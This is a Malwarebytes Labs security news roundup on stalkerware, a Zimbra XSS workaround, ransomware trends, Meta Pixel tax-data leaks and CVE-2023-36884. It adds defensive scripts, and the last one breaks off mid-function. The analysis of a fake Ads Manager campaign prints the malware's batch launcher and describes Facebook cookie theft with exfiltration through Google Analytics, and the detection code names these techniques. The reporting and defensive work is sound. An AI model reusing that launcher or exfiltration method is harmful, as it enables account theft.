
A week in security (July 10 – 16)

Last week on Malwarebytes Labs:

Stay safe!


Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Spy vs. spy: Exploring the LetMeSpy hack, with maia arson crimew

The language of a data breach, no matter what company gets hit, is largely the same. There’s the stolen data—be it email addresses, credit card numbers, or even medical records. There are the users—unsuspecting, everyday people who, through no fault of their own, mistakenly put their trust into a company, platform, or service to keep their information safe. And there are, of course, the criminals. Some operate in groups. Some act alone. Some steal data as a means of extortion. Others steal it as a point of pride. All of them, it appears, take something that isn’t theirs. 

But what happens if a cybercriminal takes something that may have already been stolen? 

In late June, a mobile app that can, without consent, pry into text messages, monitor call logs, and track GPS location history, warned its users that its services had been hacked. Email addresses, telephone numbers, and the content of messages were swiped, but how they were originally collected requires scrutiny. That’s because the app itself, called LetMeSpy, is advertised as a parental and employer monitoring app, to be installed on the devices of other people that LetMeSpy users want to track. 

Want to read your child’s text messages? LetMeSpy says it can help. Want to see where they are? LetMeSpy says it can do that, too. What about employers who are interested in the vague idea of “control and safety” of their business? Look no further than LetMeSpy, of course.  

While LetMeSpy’s website tells users that “phone control without your knowledge and consent may be illegal in your country,” (it is in the US and many, many others) the app also claims that it can hide itself from view from the person being tracked. And that feature, in particular, is one of the more tell-tale signs of “stalkerware.” 

Stalkerware is a term used by the cybersecurity industry to describe mobile apps, primarily on Android, that can access a device’s text messages, photos, videos, call records, and GPS locations without the device owner knowing about said surveillance. These types of apps can also automatically record every phone call made and received by a device, turn off a device’s WiFi, and take control of the device’s camera and microphone to snap photos or record audio—all without the victim knowing that their phone has been compromised. 

Stalkerware poses a serious threat—particularly to survivors of domestic abuse—and Malwarebytes has defended users against these types of apps for years. But the hacking of an app with similar functionality raises questions. 

Today, on the Lock and Code podcast with host David Ruiz, we speak with the hacktivist and security blogger maia arson crimew about the data that was revealed in LetMeSpy’s hack, the almost-clumsy efforts by developers to make and market these apps online, and whether this hack—and others in the past—are “good.” 

“I’m the person on the podcast who can say ‘We should hack things,’ because I don’t work for Malwarebytes. But the thing is, I don’t think there really is any other way to get info in this industry.”

Tune in today. 

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use. 

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)

Act now! In-the-wild Zimbra vulnerability needs a workaround

Security experts are warning Zimbra users that a vulnerability for which there is no patch is being actively exploited in the wild. In a security update about the vulnerability, the company offered a temporary workaround which users can apply while waiting for a patch to be created.

Zimbra is an open source webmail application used for messaging and collaboration. The vulnerability, which could impact the confidentiality and integrity of users’ data, exists in Zimbra Collaboration Suite Version 8.8.15.

Zimbra is widely used across different industries and government organizations. We reported about a cross-site scripting (XSS) zero-day vulnerability in the Zimbra email platform back in February 2022. At the time, Zimbra claimed there were 200,000 businesses, and over a thousand government and financial institutions, using its software. Thousands of Zimbra mail servers were backdoored in a large scale attack exploiting that vulnerability.

In our June 2023 ransomware review we noted how the MalasLocker ransomware group had targeted vulnerabilities in Zimbra servers, including CVE-2022-24682, to enable remote code execution (RCE). This resulted in MalasLocker taking first place on the list of known attacks over the month of May 2023, displacing perennial top-spot holder LockBit.

Known ransomware attacks by gang, May 2023

Since Zimbra gives no further details, it is hard to say exactly what the problem is. The proposed fix (below, under Mitigation) does point in a direction, though: the vulnerable line takes the st request parameter and writes it straight into the page, which is the classic shape of a reflected cross-site scripting (XSS) bug. Wrapping the value in the JSTL fn:escapeXml() function, which replaces the characters that can be interpreted as HTML/XML markup (<, >, &, ' and ") with their entity equivalents, adds the missing output encoding by hand.

Zimbra makes no mention of active exploitation, but Google researcher Maddie Stone tweeted that another researcher in the Google Threat Analysis Group had seen the vulnerability being used in the wild in a targeted attack.


Earlier vulnerabilities in Zimbra allowed cybercriminals to steal emails in targeted attacks against organizations in the European government and media sectors.

Mitigation

The Zimbra security update suggests you apply the following fix manually on all of your mailbox nodes:

    1. Take a backup of the file /opt/zimbra/jetty/webapps/zimbra/m/momoveto
    2. Open the active file for editing and go to line number 40
    3. Change
      <input name="st" type="hidden" value="${param.st}"/>
      to
      <input name="st" type="hidden" value="${fn:escapeXml(param.st)}"/>

Zimbra notes that a service restart is not required so you can do it without any downtime.
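The same three steps as a script, as an added example rather than Zimbra's own tooling: it refuses to edit a file that does not contain exactly one copy of the vulnerable line, is safe to re-run, and verifies the result before reporting success. The default path is the one from the advisory; the line-number check is only a warning, since the exact line can differ between builds.

```python
#!/usr/bin/env python3
"""Apply Zimbra's momoveto workaround safely (editor's example, not Zimbra's script)."""
import shutil
import sys
import time
from pathlib import Path

# Path from the Zimbra advisory; pass another path on the command line to override.
DEFAULT_FILE = "/opt/zimbra/jetty/webapps/zimbra/m/momoveto"

VULNERABLE = '<input name="st" type="hidden" value="${param.st}"/>'
FIXED = '<input name="st" type="hidden" value="${fn:escapeXml(param.st)}"/>'


def patch_momoveto(path, expected_line=40):
    """Patch one momoveto file in place.

    Returns "patched" or "already-patched". Raises ValueError if the file does
    not contain exactly one vulnerable line, so a file that differs from what
    the advisory describes is never blindly rewritten. ``expected_line`` is
    1-based as in the advisory; a mismatch is only reported, not fatal.
    """
    path = Path(path)
    lines = path.read_text(encoding="utf-8").splitlines(keepends=True)

    hits = [i for i, line in enumerate(lines) if VULNERABLE in line]
    if not hits and any(FIXED in line for line in lines):
        return "already-patched"
    if len(hits) != 1:
        raise ValueError(f"{path}: expected one vulnerable line, found {len(hits)}")

    idx = hits[0]
    if idx + 1 != expected_line:
        print(f"note: vulnerable line is at {idx + 1}, advisory says {expected_line}",
              file=sys.stderr)

    # Step 1: timestamped backup next to the original (metadata preserved).
    backup = path.with_name(f"{path.name}.bak.{time.strftime('%Y%m%d%H%M%S')}")
    shutil.copy2(path, backup)

    # Steps 2 and 3: rewrite only that line; everything else stays byte-for-byte.
    lines[idx] = lines[idx].replace(VULNERABLE, FIXED)
    path.write_text("".join(lines), encoding="utf-8")

    # Verify before claiming success. Per Zimbra no service restart is needed.
    after = path.read_text(encoding="utf-8")
    if VULNERABLE in after or FIXED not in after:
        raise RuntimeError(f"{path}: verification failed, restore from {backup}")
    return "patched"


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_FILE
    print(patch_momoveto(target))
```

Run it once per mailbox node as the zimbra user; a second run reports already-patched and leaves the file alone, which makes it safe to push through whatever configuration management you already use.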

We will keep you posted when a patch is made available and in case there are other developments around this bug.


We don’t just report on vulnerabilities—we identify them, and prioritize action.

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Ransomware making big money through “big game hunting”

Ransomware generates big money for the groups behind it, with new research confirming at least part of the scale of the problem. Chainalysis, a blockchain research firm, looked at data from monitored cryptocurrency wallets and concluded that around $449 million has been taken from victims in the last six months.

As The Record correctly notes, the actual figure will likely be significantly higher because only monitored wallets are included in the study. In terms of what’s going on out there, payments under $1,000 and above $100,000 are both on the up. It’s claimed that ransomware groups could pull in around $900 million in 2023, with the return of “big game hunting” being one of the key factors for the bump.

What is big game hunting? Well, this is the practice of targeting large, financially well-off corporations in order to secure the biggest possible payouts. Even with the increase in attacks on smaller companies, taking on the big entities is where the most enticing payouts are waiting to be had.

As an example of payout sizes, BlackBasta’s 2023 average payment size is $762,634 and its median is $147,106. Cl0p checks in with a $1,730,486 average and a $1,946,335 median. At the other end of the scale the smaller, less sophisticated deployments such as Phobos creep into view with a $1,719 average and a $300 median.

Whatever the size of the individual payments, the gangs are still collecting them and continuing to make bank. It’s also suspected that as more firms refuse to pay their extortionists, ransomware authors are responding by increasing their ransom demands. The research also notes that additional tactics are being used in cases of non-payment to up the ante further: threats to leak data, sell it online, break other parts of the business, attack related firms, or even harass employees.

It’s not all doom and gloom where cryptocurrency payments are concerned. With the notable exception of ransomware, cryptocurrency crime across 2023 is in “sharp decline”. Cryptocurrency businesses are getting a handle on scams, users new and old are learning about how to protect their investments, and law enforcement pressure on cryptocurrency fraud is likely having an impact.

Back in the realm of ransomware, things aren’t perhaps quite as good with some of the big hitters from our June ransomware review serving up exploits, dubious “charity donation” requests, and an increase in attacks on education.

Elsewhere, we have students being used to apply pressure to impacted organisations and relentless attacks on schools. It would be unwise to think the scale of ransomware’s day to day impact is in any danger of dropping off anytime soon.

How to avoid ransomware

  • Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
  • Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
  • Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
  • Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
  • Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.


Tax preparation firms shared sensitive information with Meta

A group of seven US senators has sent a letter to the heads of the IRS, the Department of Justice, the Federal Trade Commission and the IRS watchdog, revealing that they have found evidence that reveals “a shocking breach of taxpayer privacy by tax prep companies and by Big Tech firms.”

According to the letter, information about tens of millions of US taxpayers was sent by three tax preparation firms to social media giant Meta. The letter asked the agencies to immediately open an investigation.

The tax firms used Pixel code on their websites to track and improve their media campaigns. Pixel is an integral part of Meta’s tracking infrastructure, which collects data about people online. That data is eventually used for targeted advertising, tailored content recommendations, and to train Meta’s algorithms.

The Pixel code is freely available and designed to help both the website owner and Meta. The code gathered information like names and email addresses, but also more detailed information, including data on users’ income, filing status, refund amounts, and dependents’ college scholarship amounts.

Despite what you might expect, it doesn’t matter whether the person using the tax filing service has an account on Facebook or other platforms operated by Meta.
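As an added example (not code from Malwarebytes, The Markup or Meta), here is a small audit script for the mechanism just described. It assumes the publicly documented shape of a pixel hit: a GET to www.facebook.com/tr/ whose query string carries the event name in ev, the page URL in dl, site-chosen custom data as cd[name] parameters, and advanced-matching user data as ud[name] parameters. The sample capture, the pixel id and the field names are constructed for the example; point it at the URLs from your own site’s network panel or proxy log to see what actually leaves the page.

```python
"""Audit captured Meta Pixel requests for sensitive fields (editor's example)."""
import re
from urllib.parse import parse_qsl, urlsplit

# Field names that should never travel to an ad network. Extend for your own forms.
SENSITIVE_KEYS = re.compile(
    r"(income|refund|filing[_ ]?status|dependent|scholarship|ssn|social|dob|"
    r"birth|salary|wage|agi|tax|email|phone|first_?name|last_?name)",
    re.I,
)


def is_pixel_hit(url):
    """True for the pixel's own collection endpoint, www.facebook.com/tr/."""
    parts = urlsplit(url)
    return parts.netloc.endswith("facebook.com") and parts.path.startswith("/tr")


def audit_pixel_request(url):
    """Return (parameter, value) pairs that look sensitive, or [] for a clean hit."""
    if not is_pixel_hit(url):
        return []
    findings = []
    for key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        # cd[...] is custom event data the site chose to send; ud[...] is
        # "advanced matching" (hashed email, name, phone) and is PII regardless.
        m = re.fullmatch(r"(cd|ud)\[(.+)\]", key)
        if m and (m.group(1) == "ud" or SENSITIVE_KEYS.search(m.group(2))):
            findings.append((key, value))
        elif key == "dl" and SENSITIVE_KEYS.search(urlsplit(value).query):
            # The page URL itself leaks when it carries a sensitive query string.
            findings.append((key, value))
    return findings


def audit_log(urls):
    """Map each leaking pixel hit in a capture to its findings."""
    report = {}
    for url in urls:
        found = audit_pixel_request(url)
        if found:
            report[url] = found
    return report


# Constructed sample capture (not real traffic); pixel id and values are made up.
SAMPLE_CAPTURE = [
    "https://www.facebook.com/tr/?id=123456789&ev=PageView&dl=https%3A%2F%2Ftax.example%2Fstart",
    "https://www.facebook.com/tr/?id=123456789&ev=Lead&cd[refund_amount]=1834"
    "&cd[filing_status]=married&cd[button]=submit",
    "https://www.facebook.com/tr/?id=123456789&ev=CompleteRegistration&ud[em]=5b8b...&ud[fn]=9f3a...",
    "https://www.google-analytics.com/collect?v=1&t=pageview&dp=%2Fstart",
]

if __name__ == "__main__":
    for hit, found in audit_log(SAMPLE_CAPTURE).items():
        print(hit.split("?")[0], found)
```

The keyword list is deliberately broad; a false positive on a field named "taxonomy" costs a minute of review, while a missed refund amount is exactly the class of leak the senators’ letter describes.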

One of the tax preparation firms stated that they used the Meta Pixel to deliver a more personalized experience for their customers.

“We did NOT know and were never notified that personal tax information was being collected by Facebook from the Pixel.”

Meta, on the other hand, stated that it feels it has been clear in its policies that advertisers should not send sensitive information about people through its business tools.

“Doing so is against our policies and we educate advertisers on properly setting up Business tools to prevent this from occurring. Our system is designed to filter out potentially sensitive data it is able to detect.”

Both sides agree that this should not have happened, and so do we, but that does not explain why it happened anyway.

The problem was flagged earlier by The Markup. We reported about their Pixel Hunt project in January of 2022. The Markup also found Google’s analytics tool on one of the tax preparers’ websites; it didn’t send out any names, although it did send some of the financial information to Google.

The three tax preparation firms mentioned in the letter are H&R Block, TaxAct, and TaxSlayer. The information gathered on the websites of these firms has been sent to Meta over the course of at least two years.

If you don’t want your information to be gathered and shared by trackers, you can use solutions like Malwarebytes Browser Guard, a browser extension that, among others, blocks third-party ad trackers.



Malwarebytes stops 100% of Advanced Threats in latest AV-Test assessment

AV-TEST, a leading independent tester of cybersecurity solutions, has just given Malwarebytes two Advanced awards for the ability of our consumer and business products to protect against the latest attack techniques.

Let’s take a deeper dive into the test and the results.

Advanced Threat Protection test breakdown

AV-Test’s bi-monthly Advanced Threat Protection exam scrutinizes Windows 11 security products, testing their ability to counter new attack methods.

In the April 2023 trial, they assessed defenses against the “Inline Execute Assembly” technique used by data stealers and ransomware. The test involved 10 malware samples sent via spearphishing emails. If not caught early, data stealers could siphon off data, and ransomware could start encrypting data, while communicating with a C2 server. 

Points were given for detecting key attack phases, with a perfect score being 35 points.

In the latest results, both Malwarebytes Premium and Malwarebytes Endpoint Protection aced the test, earning the top “Advanced” rating for detecting 10/10 samples and receiving the full 35/35 points.

Check out the full results: https://www.av-test.org/en/news/advanced-threat-protection-against-the-latest-data-stealers-and-ransomware-techniques/

Advanced test: Enterprise results

Malwarebytes Endpoint Protection successfully detected and blocked all ten instances of malware (5 data stealers and 5 ransomware samples) sent via spearphishing emails in the initial two steps—when they first landed on the system and when they attempted to become active—thereby passing all tests in these phases.


Advanced test: Consumer results

Malwarebytes Premium fared no differently, having also successfully detected and blocked all ten instances of malware when they first landed on the system and attempted to become active.

The foundation for superior Endpoint Detection and Response (EDR)

Malwarebytes Endpoint Protection (EP) is not merely a standalone product; it’s the bedrock of our Malwarebytes Endpoint Detection and Response (EDR) solution.

Leveraging the robust detection and prevention capabilities validated by AV-Test, Malwarebytes EDR constantly monitors endpoint systems and automatically kills processes associated with advanced threat activity. Learn more about our endpoint security solutions.

GET A FREE BUSINESS TRIAL

Learn more about what experts and customers are saying about Malwarebytes:

Malwarebytes recognized as endpoint security leader by G2

MITRE ATT&CK® Evaluation results: Malwarebytes’ efficiency, delivered simply, earns high marks

Malwarebytes receives highest rankings in recent third-party tests

Malwarebytes outperforms competition in latest MRG Effitas assessment


Zero-day deploys remote code execution vulnerability via Word documents

An unpatched zero-day vulnerability is currently being abused in the wild, targeting those with an interest in Ukraine. Microsoft reports that CVE-2023-36884 is tied to reports of:

…a series of remote code execution vulnerabilities impacting Windows and Office products. Microsoft is aware of targeted attacks that attempt to exploit these vulnerabilities by using specially-crafted Microsoft Office documents. An attacker could create a specially crafted Microsoft Office document that enables them to perform remote code execution in the context of the victim. However, an attacker would have to convince the victim to open the malicious file.

While the CVE is being updated with new information and links to appropriate security information, the Microsoft Security Blog is currently exploring the issue in detail.

This all ties back to a phishing campaign operated by a group being tracked as “Storm-0978” which targets defence and government entities in both Europe and North America. The campaign itself makes use of bait related to the Ukrainian World Congress, a non-profit organisation of “all Ukrainian public organisations in diaspora”.

These infections originate from remote code execution via Word documents using the Ukraine-themed bait described above, as well as an “abuse of vulnerabilities contributing to a security feature bypass”. A fake OneDrive loader delivers a backdoor with similarities to RomCom, the group’s primary backdoor tool. It’s unusual to see websites involved in this kind of attack still online hours after a reveal, but here are some shots we took of both the site and the downloads (thanks to Jerome):

Fake congress website

Word exploit site

Some of the other attacks launched by this group involve distribution of trojanized versions of popular software. Once the backdoor has taken hold, the group “may steal credentials to be used in targeted operations”.

Popular tools used for these installations include trojanized versions of SolarWinds Network Performance Monitor, KeePass, Signal, and Adobe products. Bogus domains imitating the real thing are registered and used as convincing fronts for the infected software.

Microsoft notes that this group also has a hand in ransomware attacks, though it is less targeted in nature and unrelated to any espionage-themed operations. Attacks which have been identified as belonging to Storm-0978 in this realm have impacted finance and telecommunications industries.

A variety of attacks on several fronts, then. 

Microsoft gives the following advice for organisations concerned with the potential threat of compromise from the most recent attacks:

CVE-2023-36884 specific recommendations

  • Customers who use Microsoft Defender for Office 365 are protected from attachments that attempt to exploit CVE-2023-36884.
  • In current attack chains, the use of the Block all Office applications from creating child processes attack surface reduction rule prevents the vulnerability from being exploited.
  • Organizations who cannot take advantage of these protections can set the FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION registry key to avoid exploitation. Please note that while these registry settings would mitigate exploitation of this issue, they could affect regular functionality for certain use cases related to these applications.

You could also consider blocking outbound SMB traffic.



Ransomware review: July 2023

This article is based on research by Marcelo Rivero, Malwarebytes’ ransomware specialist, who monitors information published by ransomware gangs on their Dark Web sites. In this report, “known attacks” are those where the victim did not pay a ransom. This provides the best overall picture of ransomware activity, but the true number of attacks is far higher.

Following a three-month lull of activity, Cl0p returned with a vengeance in June and beat out LockBit as the month’s most active ransomware gang. The group’s 91 attacks come not long after their extensive GoAnywhere campaign in March, when they hit over 100 organizations using a nasty zero-day.

June also witnessed a staggering increase in attacks from relatively new gangs such as Akira (26) and 8Base (41), enough to propel both of them into the top five—a designation usually reserved for more familiar names like ALPHV, who was conspicuously silent in June. 

Other big stories in June include a suspected LockBit affiliate arrest, the Royal ransomware gang toying with a new encryptor, and a notable increase in attacks on the Manufacturing sector.

Known ransomware attacks by gang, June 2023

Comparing June to the earlier months of the year, we notice several shifts in ransomware activity. There was a massive decrease in the activity from Royal, for example, which normally dominates the monthly rankings—often cracking into the top five—with an average of roughly 30 attacks a month in that period. But last month, they posted just two victims. 

While a sudden dip in attacks isn’t too unusual for top ransomware gangs, it’s worth mentioning that in last month’s review we speculated that Royal might be going through a rebrand. That’s because a new ransomware called BlackSuit had appeared which shared 98 percent of its code with the infamous Royal ransomware.

Considering that both Royal and BlackSuit were active last month, however, a rebrand probably isn’t happening any time soon. Instead, it’s likely that Royal is simply testing a new encryptor—especially considering that BlackSuit was used in just two attacks last month—and that this lull can be explained as more or less a research period for them.

Other interesting anomalies in June include 47 attacks on the Manufacturing industry (which usually averages around 20 attacks a month) and notable increases in attacks on Switzerland (14) and Brazil (13), both of which are normally attacked only two or three times a month. Part of this can be explained by the fact that 8BASE disproportionately attacked Brazil with 11 attacks last month, while PLAY focused on Switzerland (5).

Known ransomware attacks by country, June 2023

Known ransomware attacks by industry sector, June 2023

Cl0p’s precipitous rise to the top of the charts this month, on the other hand, can be explained by their exploitation of a zero-day in MOVEit Transfer, a widely used file transfer software.

The vulnerability, which could allow attackers to gain escalated privileges and unauthorized access to an environment, was first disclosed on May 31st in a security bulletin released by Progress. But while it was clear early on that attackers were actively exploiting CVE-2023-34362, it was only a few days later that it became clear that Cl0p was behind the attacks. A Cl0p representative claimed that they had been testing the vulnerability since July 2021 and that they had decided to deploy it over the Memorial Day weekend. What’s more, two other vulnerabilities in MOVEit were found while new victims were still coming forward.

In terms of the fallout, it’s tough to overstate the havoc Cl0p was able to wreak thanks to the zero-day.

The MOVEit data breaches had widespread impacts, affecting everything from the Oregon DMV and Louisiana OMV (Office of Motor Vehicles)—including the leak of nearly 10 million drivers’ licenses—to the University of Rochester and multiple corporations. PBI Research Services also reported a data breach that exposed information for 4.75 million people. The US government even offered a reward of up to $10 million for information on Cl0p after several federal agencies fell victim to the gang.

LockBit 

LockBit reportedly squeezed about $91 million out of US organizations with around 1,700 attacks since 2020, according to a June report by CISA. As confirmed by our own research data, CISA also found LockBit took the top spot as the biggest global ransomware threat in 2022.

As for who was hit the hardest, around 16 percent of ransomware incidents affecting State, Local, Tribal, and Territorial (SLTT) governments were from LockBit, says the MS-ISAC.

In other news, a suspected LockBit affiliate named Ruslan Magomedovich Astamirov, a 20-year-old from the Chechen Republic, was arrested in Arizona last month. The US Justice Department thinks he’s been deploying LockBit ransomware on victim networks both in the States and overseas, with the investigation having run from August 2020 through March 2023.

Astamirov is now facing charges of wire fraud and of intentionally damaging protected computers, plus he’s accused of making ransom demands through deploying ransomware. The arrest makes him the third LockBit affiliate charged in the US since November.

Newcomers

NoEscape

NoEscape is a new ransomware which has been doing the rounds in underground forums since May 2023. Developed in-house using C++, NoEscape uses a hybrid encryption scheme: ChaCha20 to encrypt file contents, and RSA to protect the ChaCha20 keys.

Last month, NoEscape posted 7 victims on their leak site.


Darkrace

DarkRace is a new ransomware group first discovered by researcher S!Ri. Darkrace specifically targets Windows operating systems and has several similarities to LockBit.

The gang attacked 10 victims last month, the majority of them being from the Information and Communications Technology (ICT) sectors. Geographically, most victims are located in Europe, specifically Italy. 

Rhysida

Rhysida, a new ransomware gang claiming to be a “cybersecurity team,” has been in operation since May 17, 2023, making headlines for their high-profile attack against the Chilean Army.

The gang published a whopping eighteen victims on their leak site in June, making it one of the most prolific newcomers in our monthly reviews to date.

From Malvertising to Ransomware: A ThreatDown webinar recap

Our recent webinar From Malvertising to Ransomware highlights the clear connection between malvertising—the practice of embedding malicious code within legitimate online advertisements—and the epidemic of ransomware attacks affecting businesses globally.

Presented by Mark Stockley, security evangelist at Malwarebytes, and Jerome Segura, Director of Threat Intelligence at Malwarebytes, the webinar explains how malvertising has evolved into an effective entry point in the cyberattack “kill chain.”


By leveraging the broad reach and precision targeting of digital advertising, threat actors can compromise systems, gather valuable credentials, and ultimately lay the groundwork for debilitating ransomware attacks. Speakers mention the Royal ransomware group as just one example of a threat actor using this tactic.

Toward the end of the webinar, the speakers provide a set of tips for protecting businesses from these attacks, including the importance of tools such as Endpoint Detection and Response (EDR) and Managed Detection and Response (MDR) in combatting them.

If you missed the live session, it’s not too late to get the low-down on the malvertising-ransomware connection. Watch the full webinar here to ensure you’re informed and prepared to tackle these nasty threats!

Watch the webinar 

Criminals target businesses with malicious extension for Meta’s Ads Manager and accidentally leak stolen accounts

Like all social media platforms, Facebook constantly has to deal with fake accounts, scams and malware. We have written about scams targeting consumers that redirect to fake Microsoft alert pages, but there are also threats targeting businesses that use Facebook to promote their products and services.

In the past few weeks, there’s been a resurgence in sponsored posts and accounts that impersonate Meta/Facebook’s own Ads Manager. Crooks are promising better advertising via optimization, and increased performance when you use their (malware-laden) software. Meta has tracked and analyzed several threat actors such as DuckTail that have been active for a number of years with a particular interest for Facebook advertising accounts.

Now, we’ve discovered a new attack that uses malicious Chrome extensions to steal Facebook account credentials and is not related to the DuckTail malware. While tracking this campaign, we noticed the threat actors made a mistake when they packaged one of the malware files with their own stolen data.

We have passed the information about this campaign and the threat actors to Meta and thank it for taking prompt action following our reporting.

Key takeaways

  • Vietnamese threat actors are actively targeting Facebook business accounts
  • Victims are lured via fake Ads Manager software promoted on Facebook
  • Malicious Google Chrome extensions are used to steal and extract login information
  • Over 800 victims worldwide, 310 in the US
  • More than $180K in compromised ad budget

Fake Ads Manager accounts

Ads Manager is the product that enables users to run online ads on Facebook, Instagram and other platforms owned by Meta. An article in TechCrunch from May describes how scammers were buying ads from Meta via verified accounts. They were trying to entice potential victims into downloading software to manage their advertising via a “more professional and secure tool”.

In early June, we identified fraudulent accounts running the same scam using similar lures. It is also worth noting that these accounts often have tens of thousands of followers and any of their posts can quickly become viral. Scammers are primarily targeting business users who may spend ad dollars on the platform.


In order to compromise those accounts, they first need to redirect potential victims onto external websites. We’ve seen several different domains that are essentially phishing pages using the Meta logo and branding. The lure is the Facebook Ads Manager program that is pushed via a download link. We’ve seen various cloud providers abused to host these password-protected RAR archives ranging from Google to Trello, as seen below.


Malicious Chrome extension

Once extracted from the archive, the file is an MSI installer package that installs several components under C:\Program Files (x86)\Ads Manager\Ads Manager. We can see a batch script (perhaps named after Google Bard), and two folders. One of them is for a custom Chrome extension while the System folder contains a standalone WebDriver file.


The batch script is launched after the MSI installer completes and essentially spawns a new browser window launched with the custom extension from that previous installation path, pointing the victim to the Facebook login page.

taskkill /F /IM chrome.exe
taskkill /F /IM chromedriver.exe
timeout /t 1 >nul
start chrome.exe --load-extension="%~dp0/nmmhkkegccagdldgiimedpiccmgmiedagg4" "https://www.facebook.com/business/tools/ads-manager"
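The launch pattern above (kill the running browser, then restart it with a side-loaded extension from the install directory) is something endpoint telemetry can catch. The following is an added detection example, not code from the original post or the campaign: it scores constructed Sysmon-style process-creation records, and the event layout (ts, ppid, parent, image, cmd) is an assumption.

```python
import re

# Matches the --load-extension switch, quoted or bare (Chrome accepts both).
LOAD_EXT = re.compile(r'--load-extension=(?:"([^"]+)"|(\S+))', re.I)
# Developers side-load extensions from under their own profile; a directory
# under Program Files dropped by an installer is a different story.
USER_PROFILE = re.compile(r"\\Users\\[^\\]+\\", re.I)

def extension_path(cmdline: str):
    """Return the side-loaded extension directory from a chrome.exe command line, or None."""
    m = LOAD_EXT.search(cmdline)
    return (m.group(1) or m.group(2)) if m else None

def detect_forced_extension_load(events: list) -> list:
    """Flag chrome.exe launches that side-load an unpacked extension in the
    context of the batch script above: chrome.exe killed by the same parent
    seconds earlier, a cmd.exe parent, and a path outside any user profile.
    Each event: ts (seconds), ppid, parent, image, cmd."""
    findings, last_chrome_kill = [], {}
    for ev in events:
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        if image == "taskkill.exe" and re.search(r"/IM\s+chrome\.exe", ev["cmd"], re.I):
            last_chrome_kill[ev["ppid"]] = ev["ts"]
            continue
        if image != "chrome.exe" or not (path := extension_path(ev["cmd"])):
            continue
        reasons = ["unpacked extension loaded via --load-extension"]
        if not USER_PROFILE.search(path):
            reasons.append("extension path outside any user profile")
        if ev["parent"].lower().endswith("cmd.exe"):
            reasons.append("launched by cmd.exe")
        killed = last_chrome_kill.get(ev["ppid"])
        if killed is not None and ev["ts"] - killed <= 5:
            reasons.append("chrome.exe killed by the same parent seconds earlier")
        if len(reasons) > 1:  # a lone --load-extension is just a developer at work
            findings.append({"ts": ev["ts"], "path": path, "reasons": reasons})
    return findings

# Constructed process-creation events (Sysmon Event ID 1 style), not real telemetry.
EVENTS = [
    {"ts": 100, "ppid": 7, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\taskkill.exe", "cmd": "taskkill /F /IM chrome.exe"},
    {"ts": 101, "ppid": 7, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmd": r'chrome.exe --load-extension="C:\Program Files (x86)\Ads Manager\Ads Manager/nmmhkkegccagdldgiimedpiccmgmiedagg4" "https://www.facebook.com/business/tools/ads-manager"'},
    {"ts": 900, "ppid": 9, "parent": r"C:\Windows\explorer.exe",  # developer test run
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmd": r'chrome.exe --load-extension="C:\Users\dev\src\my-extension"'},
]
```

Only the scripted launch is reported; the developer's own test run carries a single reason and stays quiet.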

That custom extension is cleverly disguised as Google Translate and is considered ‘Unpacked’ because it was loaded from the local computer, rather than the Chrome Web Store. A quick look at its source code reveals hex obfuscation right away, an attempt to hide what it is actually doing.

After reverse engineering this extension, it became quite clear that it had nothing to do with Google Translate. In fact, the code is entirely focused on Facebook and grabbing important pieces of information that could allow an attacker to log into accounts. We can see that the threat actors are interested in Facebook cookies which they request via the cookies.getAll method.

We also notice an interesting way to exfiltrate that data by using Google Analytics. This technique was previously documented by HUMAN as a way to bypass CSP.
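The two traits just described, a cookies.getAll call scoped to Facebook and a beacon to Google Analytics, can be checked for in an unpacked extension without running it. Below is an added triage example written for this post, not the campaign's code or any Malwarebytes tooling: it decodes the \xNN escapes first, then searches the manifest and scripts; the sample extension it runs on is constructed here and is not the real sample.

```python
import re

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")

def deobfuscate_hex(src: str) -> str:
    """Replace JavaScript \\xNN escapes with the characters they encode."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), src)

# Behaviours described above, searched for after decoding: a cookie dump through
# chrome.cookies.getAll (dot or bracket form), a Facebook scope, and a beacon to
# the Google Analytics collect endpoint that a CSP would usually allow through.
INDICATORS = {
    "cookie_dump": re.compile(r"""cookies\.getAll|\[\s*['"]cookies['"]\s*\]\s*\[\s*['"]getAll['"]\s*\]"""),
    "facebook_scope": re.compile(r"facebook\.com", re.I),
    "ga_beacon": re.compile(r"google-analytics\.com/(?:g/)?collect", re.I),
}
RISKY_PERMS = ("cookies", "<all_urls>")

def triage_extension(manifest: dict, scripts: dict) -> dict:
    """Return, per indicator, the script files that match it, the permissions
    that make cookie theft possible, and an overall verdict."""
    findings = {name: [] for name in INDICATORS}
    for fname, src in scripts.items():
        decoded = deobfuscate_hex(src)
        for name, rx in INDICATORS.items():
            if rx.search(decoded):
                findings[name].append(fname)
    perms = list(manifest.get("permissions", [])) + list(manifest.get("host_permissions", []))
    findings["risky_permissions"] = sorted(p for p in perms if p in RISKY_PERMS or "facebook" in p)
    # cookies permission + a getAll call + an exfil beacon is the combination to act on
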